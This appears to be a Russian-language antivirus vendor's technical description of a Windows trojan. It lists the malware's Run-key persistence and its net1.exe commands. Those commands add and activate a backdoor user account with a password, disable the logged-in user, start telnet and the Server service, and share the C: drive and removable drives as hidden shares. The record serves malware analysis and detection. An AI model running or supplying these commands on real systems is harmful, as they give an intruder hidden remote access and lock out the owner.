Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'systemkey' = '<Полный путь к вирусу>'
- Диспетчера задач (Taskmgr)
- '<SYSTEM32>\net1.exe' user СЫАбїЫїЫ394262597мб 061100 /add
- '<SYSTEM32>\net1.exe' user СЫАбїЫїЫ394262597мб /active:yes
- '<SYSTEM32>\net1.exe' user %USERNAME% /active:no
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s СЫАбїЫїЫ394262597мб /add
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\net1.exe' share houmen$=c:\
- '<SYSTEM32>\net1.exe' start Server
- '<SYSTEM32>\net1.exe' share houmen2$=<Имя диска съемного носителя>:\
- ClassName: 'Progman' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''